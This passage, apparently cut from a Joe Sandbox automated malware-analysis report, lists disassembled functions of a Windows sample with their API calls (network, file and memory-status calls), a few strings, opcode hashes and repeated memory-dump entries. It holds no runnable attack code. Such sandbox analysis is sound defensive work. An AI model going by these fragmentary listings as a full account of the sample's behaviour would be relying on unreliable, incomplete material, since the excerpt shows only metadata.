                                      • Associated: 00000001.00000002.3511680370.00000000008B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511916887.0000000000993000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511973051.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512007247.00000000009D1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512056461.00000000009D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512096343.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_8b0000_8AbMCL2dxM.jbxd
                                      Similarity
                                      • API ID: _free
                                      • String ID: COMSPEC$cmd.exe
                                      • API String ID: 269201875-2256226045
                                      • Opcode ID: 66787675963ee615deb00a8a19f2555c7c44b0079514549a611a9d6b2c05a04e
                                      • Instruction ID: e0fa024c546f1e78550d85b0fd979c438699f7f456eb06a2a8f8ae575c1d4f39
                                      • Opcode Fuzzy Hash: 66787675963ee615deb00a8a19f2555c7c44b0079514549a611a9d6b2c05a04e
                                      • Instruction Fuzzy Hash: 4631EB71D006199B8B10AFE8CD829BFBBBCDE81764F160366F804A7251DA304E05C7E1
                                      Function 008C4DAB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 36COMMON
                                      Download Yara Rule
                                      APIs
                                      • NetApiBufferFree.NETAPI32(00000000), ref: 008C4DC6
                                      • NetApiBufferFree.NETAPI32(00000000), ref: 008C4DE2
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3511706844.00000000008B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                      • Associated: 00000001.00000002.3511680370.00000000008B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511916887.0000000000993000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511973051.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512007247.00000000009D1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512056461.00000000009D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512096343.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_8b0000_8AbMCL2dxM.jbxd
                                      Similarity
                                      • API ID: BufferFree
                                      • String ID: Default
                                      • API String ID: 710964542-753088835
                                      • Opcode ID: db966e92181a23f36e3c08c18bf52a03083b3f18eae4a54df637a4ccbf4298e6
                                      • Instruction ID: 64ac1584be8cb007ce0456dd0adc4e4414e57b2104af19b2bfc142977accbc3e
                                      • Opcode Fuzzy Hash: db966e92181a23f36e3c08c18bf52a03083b3f18eae4a54df637a4ccbf4298e6
                                      • Instruction Fuzzy Hash: 0CF0AF35A152099BCB18EF98D4A1BADB7B1FB48321F10422ED916A3280DB36A900CB90
                                      Function 00975E27 Relevance: 4.7, APIs: 3, Instructions: 186COMMONLIBRARYCODE
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3511706844.00000000008B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                      • Associated: 00000001.00000002.3511680370.00000000008B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511916887.0000000000993000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511973051.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512007247.00000000009D1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512056461.00000000009D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512096343.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_8b0000_8AbMCL2dxM.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 9891b14e3667b87ad296c8505911017de47da1405de26353fbea5a17f544a5f0
                                      • Instruction ID: d9a4d6a16156ad6fe4823f7b611869eb3e91d480caf6b4df5e8b7d34bf437db0
                                      • Opcode Fuzzy Hash: 9891b14e3667b87ad296c8505911017de47da1405de26353fbea5a17f544a5f0
                                      • Instruction Fuzzy Hash: C651F872D0460AAFCF119FA4CC45FEE7BB8EF85310F168455F409A7292D7B59901DB60
                                      Function 0097615C Relevance: 4.6, APIs: 3, Instructions: 61COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      • CloseHandle.KERNEL32(00000000,00000000,0092974C,?,0097607A,0092974C,009CCF80,0000000C), ref: 009761B2
                                      • GetLastError.KERNEL32(?,0097607A,0092974C,009CCF80,0000000C), ref: 009761BC
                                      • __dosmaperr.LIBCMT ref: 009761E7
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3511706844.00000000008B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                      • Associated: 00000001.00000002.3511680370.00000000008B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511916887.0000000000993000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511973051.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512007247.00000000009D1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512056461.00000000009D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512096343.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_8b0000_8AbMCL2dxM.jbxd
                                      Similarity
                                      • API ID: CloseErrorHandleLast__dosmaperr
                                      • String ID:
                                      • API String ID: 2583163307-0
                                      • Opcode ID: 8b7fb3714a12fd37462d1060b2cd0d13bcb313abee309a836557405fa3d53e56
                                      • Instruction ID: 5c31982a4440dc879d53b501483e31a913a635c8af801e3b4b1313eaa19f4e3f
                                      • Opcode Fuzzy Hash: 8b7fb3714a12fd37462d1060b2cd0d13bcb313abee309a836557405fa3d53e56
                                      • Instruction Fuzzy Hash: 3C012B3360D56016D61467785C8D77E676D8FC2734F65C559F80CC71D3DA249C859190
                                      Function 0097975C Relevance: 4.6, APIs: 3, Instructions: 50COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      • SetFilePointerEx.KERNEL32(00000000,00000000,00929776,00000000,00000002,00929776,00000000,?,?,?,0097980B,00000000,00000000,00929776,00000002), ref: 00979795
                                      • GetLastError.KERNEL32(?,0097980B,00000000,00000000,00929776,00000002,?,0096B262,?,00000000,00000000,00000001,?,00929776,?,0096B317), ref: 0097979F
                                      • __dosmaperr.LIBCMT ref: 009797A6
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3511706844.00000000008B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                      • Associated: 00000001.00000002.3511680370.00000000008B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511916887.0000000000993000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511973051.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512007247.00000000009D1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512056461.00000000009D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512096343.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_8b0000_8AbMCL2dxM.jbxd
                                      Similarity
                                      • API ID: ErrorFileLastPointer__dosmaperr
                                      • String ID:
                                      • API String ID: 2336955059-0
                                      • Opcode ID: 1affe48ba39c58362adf0f28b567406ae92084309b6d4c4b1d27876fed596e09
                                      • Instruction ID: 996b6082234a75e40f79086d3bf38849ea6adec5a8db4a53e4b150cf13822274
                                      • Opcode Fuzzy Hash: 1affe48ba39c58362adf0f28b567406ae92084309b6d4c4b1d27876fed596e09
                                      • Instruction Fuzzy Hash: 23014C33A28115BFCB099FA9DC05DAE7B2DEFC5320F344249F8198B190EA719D519BA0
                                      Function 008C6B20 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 172networkCOMMON
                                      Download Yara Rule
                                      APIs
                                      • InternetConnectW.WININET(?,?,00000050,00000000,00000000,00000003,00000000,00000000), ref: 008C6BE4
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3511706844.00000000008B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                      • Associated: 00000001.00000002.3511680370.00000000008B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511916887.0000000000993000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511973051.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512007247.00000000009D1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512056461.00000000009D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512096343.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_8b0000_8AbMCL2dxM.jbxd
                                      Similarity
                                      • API ID: ConnectInternet
                                      • String ID: 0.0.0.1
                                      • API String ID: 3050416762-2547487335
                                      • Opcode ID: 9209dd467b8f80fb1086aa5e55054bc8364d5003a76abb8d1bffed634bdd4909
                                      • Instruction ID: 9b7daa381e52b053aa94b40dbcd28c4969c67fbbc02f0f5f14feea8a1f7e5138
                                      • Opcode Fuzzy Hash: 9209dd467b8f80fb1086aa5e55054bc8364d5003a76abb8d1bffed634bdd4909
                                      • Instruction Fuzzy Hash: D0519F70A101589BDB18DF18CC85BADB7B6FF84304F9081ADE549E7291D734EA94CF54
                                      Function 008C4BE0 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 62COMMON
                                      Download Yara Rule
                                      APIs
                                      • GlobalMemoryStatusEx.KERNEL32(?,00000000), ref: 008C4C0D
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3511706844.00000000008B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                      • Associated: 00000001.00000002.3511680370.00000000008B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511916887.0000000000993000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511973051.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512007247.00000000009D1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512056461.00000000009D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512096343.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_8b0000_8AbMCL2dxM.jbxd
                                      Similarity
                                      • API ID: GlobalMemoryStatus
                                      • String ID: @
                                      • API String ID: 1890195054-2766056989
                                      • Opcode ID: 0526797d66f972eb7e43dc67fa639d9ebe1813ac54e7ec082066bb541ea6ae85
                                      • Instruction ID: 1ba1c14b3717592ac409a1d0ede6197a1ed92b170a6dbb0ade6145763612255b
                                      • Opcode Fuzzy Hash: 0526797d66f972eb7e43dc67fa639d9ebe1813ac54e7ec082066bb541ea6ae85
                                      • Instruction Fuzzy Hash: 8F21AE71A28B449BC320EF39D842B1BB7F5AF9AB40F400B1EF48597251EB70A85487D2
                                      Function 00975A42 Relevance: 3.1, APIs: 2, Instructions: 77fileCOMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      • WriteFile.KERNEL32(7408458B,?,?,?,00000000,?,0096B33E,E0830C40,?,00975F7E,00929776,0096B33E,?,0096B33E,0096B33E,00929776), ref: 00975ADD
                                      • GetLastError.KERNEL32(?,00975F7E,00929776,0096B33E,?,0096B33E,0096B33E,00929776,0096B33E,?,009CCF60,00000014,00962374,00000000,8304488B,00929776), ref: 00975B06
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3511706844.00000000008B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                      • Associated: 00000001.00000002.3511680370.00000000008B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511916887.0000000000993000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511973051.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512007247.00000000009D1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512056461.00000000009D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512096343.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_8b0000_8AbMCL2dxM.jbxd
                                      Similarity
                                      • API ID: ErrorFileLastWrite
                                      • String ID:
                                      • API String ID: 442123175-0
                                      • Opcode ID: 228e0743419bdbdffa4692eae9cf5986b7e7fbe95e54bb42eedf6cea6120bae3
                                      • Instruction ID: eec45f6d7753210917976ec0ddb28e49d7642ab02c7265e9b0a44861dff782cb
                                      • Opcode Fuzzy Hash: 228e0743419bdbdffa4692eae9cf5986b7e7fbe95e54bb42eedf6cea6120bae3
                                      • Instruction Fuzzy Hash: 9D21A136A147199FCB24CF59CD80BE9B3F9EB48301F1184AAE94AD7251D770AE85CF60
                                      Function 0092978D Relevance: 3.1, APIs: 2, Instructions: 71COMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3511706844.00000000008B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                      • Associated: 00000001.00000002.3511680370.00000000008B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511916887.0000000000993000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511973051.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512007247.00000000009D1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512056461.00000000009D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512096343.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_8b0000_8AbMCL2dxM.jbxd
                                      Similarity
                                      • API ID: Xfsopenstd::_
                                      • String ID:
                                      • API String ID: 2914972069-0
                                      • Opcode ID: f1ceb20ccfb40fa97923cfbfa072a47e064e6883a1f176c1ad72afeba8734c22
                                      • Instruction ID: d1168b570adb049fc986de67732ebf7810ff1f57108732fe8208ab986d3241a0
                                      • Opcode Fuzzy Hash: f1ceb20ccfb40fa97923cfbfa072a47e064e6883a1f176c1ad72afeba8734c22
                                      • Instruction Fuzzy Hash: 86112132A31231A7CF250E68FC06BBA779DAF81790F184034FD46DA1ADEA64DC02C2D0
                                      Function 0097435C Relevance: 3.1, APIs: 2, Instructions: 67COMMON
                                      Download Yara Rule
                                      APIs
                                      • GetStdHandle.KERNEL32(000000F6), ref: 009743A8
                                      • GetFileType.KERNEL32(00000000), ref: 009743BA
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3511706844.00000000008B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                      • Associated: 00000001.00000002.3511680370.00000000008B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511916887.0000000000993000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511973051.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512007247.00000000009D1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512056461.00000000009D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512096343.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_8b0000_8AbMCL2dxM.jbxd
                                      Similarity
                                      • API ID: FileHandleType
                                      • String ID:
                                      • API String ID: 3000768030-0
                                      • Opcode ID: 7ca9cc48b2c10c83c14cd02a9cb155ee18beaa0cebf1c7dc66d7829a782a5b86
                                      • Instruction ID: baf600f70e9be1e8d9edf3a118bd94ec67d1e0e2c0004459971ead1897d2f7f6
                                      • Opcode Fuzzy Hash: 7ca9cc48b2c10c83c14cd02a9cb155ee18beaa0cebf1c7dc66d7829a782a5b86
                                      • Instruction Fuzzy Hash: B61187336487414AD7308E3E8D88632BA99AB56330B384B5AD1BEC65F3C734D986E645
                                      Function 008C6FF8 Relevance: 1.7, APIs: 1, Instructions: 163filenetworkCOMMON
                                      Download Yara Rule
                                      APIs
                                      • InternetReadFile.WININET(?,?,00000400,?), ref: 008C7011
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3511706844.00000000008B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                      • Associated: 00000001.00000002.3511680370.00000000008B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511916887.0000000000993000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511973051.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512007247.00000000009D1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512056461.00000000009D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512096343.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_8b0000_8AbMCL2dxM.jbxd
                                      Similarity
                                      • API ID: FileInternetRead
                                      • String ID:
                                      • API String ID: 778332206-0
                                      • Opcode ID: f22dbdc1ccacdfa0725f02f2488b727874657aae8c4e75c923c9280d70174801
                                      • Instruction ID: a06a6a4dc0520a026b9d5dfd5f6379dd9af0beabf5b21ef670c1c0268a78ac16
                                      • Opcode Fuzzy Hash: f22dbdc1ccacdfa0725f02f2488b727874657aae8c4e75c923c9280d70174801
                                      • Instruction Fuzzy Hash: CB51B2B1A101288BDB28CF24CD85B9DB7B5FF85304F14829EE508E7291E735AAD4CF59
                                      Function 008C6550 Relevance: 1.6, APIs: 1, Instructions: 66COMMON
                                      Download Yara Rule
                                      APIs
                                      • GlobalMemoryStatusEx.KERNEL32(BA3649C5), ref: 008C656F
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3511706844.00000000008B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                      • Associated: 00000001.00000002.3511680370.00000000008B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511916887.0000000000993000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511973051.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512007247.00000000009D1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512056461.00000000009D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512096343.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_8b0000_8AbMCL2dxM.jbxd
                                      Similarity
                                      • API ID: GlobalMemoryStatus
                                      • String ID:
                                      • API String ID: 1890195054-0
                                      • Opcode ID: 0802097b847cf6fc492bd2394e0566fe3094d0647da1ea3c6e4317df80c3dc2c
                                      • Instruction ID: 9036dd8c2464f7ec763426f3cd19c5b1777833785c4db32e72e3bba86031539e
                                      • Opcode Fuzzy Hash: 0802097b847cf6fc492bd2394e0566fe3094d0647da1ea3c6e4317df80c3dc2c
                                      • Instruction Fuzzy Hash: E6117F3060470447DA249B24D552B2E73F4EF95720F40066DEE4A8B7C4FA36EC108683
                                      Function 008F72A0 Relevance: 1.6, APIs: 1, Instructions: 64COMMON
                                      Download Yara Rule
                                      APIs
                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 008F7337
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3511706844.00000000008B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                      • Associated: 00000001.00000002.3511680370.00000000008B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511916887.0000000000993000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511973051.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512007247.00000000009D1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512056461.00000000009D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512096343.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_8b0000_8AbMCL2dxM.jbxd
                                      Similarity
                                      • API ID: Exception@8Throw
                                      • String ID:
                                      • API String ID: 2005118841-0
                                      • Opcode ID: 20c7e6965f411f5cfead73da4e2354177fb34f2b60b0e9490f790c397e6bec58
                                      • Instruction ID: f772151f704691fc26cd9291fa96e0b17e973072075218dcdbcf06eaf89850be
                                      • Opcode Fuzzy Hash: 20c7e6965f411f5cfead73da4e2354177fb34f2b60b0e9490f790c397e6bec58
                                      • Instruction Fuzzy Hash: FE114C75A04209AFCB14DFE8D844FAEBBB8FF88710F50455AF90697744DA30A904CBA0
                                      Function 0097537A Relevance: 1.6, APIs: 1, Instructions: 54COMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3511706844.00000000008B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                      • Associated: 00000001.00000002.3511680370.00000000008B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511916887.0000000000993000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511973051.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512007247.00000000009D1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512056461.00000000009D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512096343.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_8b0000_8AbMCL2dxM.jbxd
                                      Similarity
                                      • API ID: __wsopen_s
                                      • String ID:
                                      • API String ID: 3347428461-0
                                      • Opcode ID: da501fe5f73812d84e4204249741587ac87c6c3c8d703e7432da90418fb98653
                                      • Instruction ID: 4b285c5d4f4c124ef57533da7a0743513258f3c1b8572ea5495de80916c1c978
                                      • Opcode Fuzzy Hash: da501fe5f73812d84e4204249741587ac87c6c3c8d703e7432da90418fb98653
                                      • Instruction Fuzzy Hash: E01118B290810AAFCB05DF58E941A9B7BF9EF48310F11849AF808AB351D671D9118BA5
                                      Function 00962544 Relevance: 1.5, APIs: 1, Instructions: 46COMMONLIBRARYCODE
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3511706844.00000000008B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                      • Associated: 00000001.00000002.3511680370.00000000008B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511916887.0000000000993000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511973051.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512007247.00000000009D1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512056461.00000000009D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512096343.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_8b0000_8AbMCL2dxM.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 42fd40b6c94fa41b560acd951f71edddf97df59d1a9087cb6c0cde23487a5f9d
                                      • Instruction ID: e2447de96deb7213300db17475f9b24cdd8295e8fffd5527b5e6d36bdf8668a5
                                      • Opcode Fuzzy Hash: 42fd40b6c94fa41b560acd951f71edddf97df59d1a9087cb6c0cde23487a5f9d
                                      • Instruction Fuzzy Hash: 0DF0C833901E145BD7313B69CC06B6A339C9FD2374F154B15F82A971D1DB78E90786A2
                                      Function 0094109A Relevance: 1.5, APIs: 1, Instructions: 43COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 0094236B
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3511706844.00000000008B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                      • Associated: 00000001.00000002.3511680370.00000000008B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511916887.0000000000993000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511973051.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512007247.00000000009D1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512056461.00000000009D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512096343.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_8b0000_8AbMCL2dxM.jbxd
                                      Similarity
                                      • API ID: Exception@8Throw
                                      • String ID:
                                      • API String ID: 2005118841-0
                                      • Opcode ID: b776112fa388366c475336c270f322ee7b34d9adabf6993e6c62f2943638f0bf
                                      • Instruction ID: c846f0d12dca8875359773a75cb541015314c86d726c2c4afe31cbd19c66fe4a
                                      • Opcode Fuzzy Hash: b776112fa388366c475336c270f322ee7b34d9adabf6993e6c62f2943638f0bf
                                      • Instruction Fuzzy Hash: 03E0D83480070DB6CB14BEB4DC16E6E3B2C1E40760B604721B824A50E3EF30E6DAC281
                                      Function 00918730 Relevance: 1.5, APIs: 1, Instructions: 40COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 0092A061: std::_Lockit::_Lockit.LIBCPMT ref: 0092A08A
                                        • Part of subcall function 0092A061: std::_Lockit::~_Lockit.LIBCPMT ref: 0092A0B2
                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 00918784
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3511706844.00000000008B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                      • Associated: 00000001.00000002.3511680370.00000000008B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511916887.0000000000993000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511973051.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512007247.00000000009D1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512056461.00000000009D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512096343.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_8b0000_8AbMCL2dxM.jbxd
                                      Similarity
                                      • API ID: Lockitstd::_$Exception@8Lockit::_Lockit::~_Throw
                                      • String ID:
                                      • API String ID: 2653793986-0
                                      • Opcode ID: 4d4d5b0bff41658a4492ae1b27b59684552ebab20093406eb8ddf5862904685d
                                      • Instruction ID: 76b2f9ec438472d3175a490c676f9e7ec1a5d5e233baa4a7b2bb14bcd21d5c4b
                                      • Opcode Fuzzy Hash: 4d4d5b0bff41658a4492ae1b27b59684552ebab20093406eb8ddf5862904685d
                                      • Instruction Fuzzy Hash: 2FE0E562D0011426D510B2656C86BFF269C4FC1B95F140038FC04D2263FF24D98E81F3
                                      Function 00976393 Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
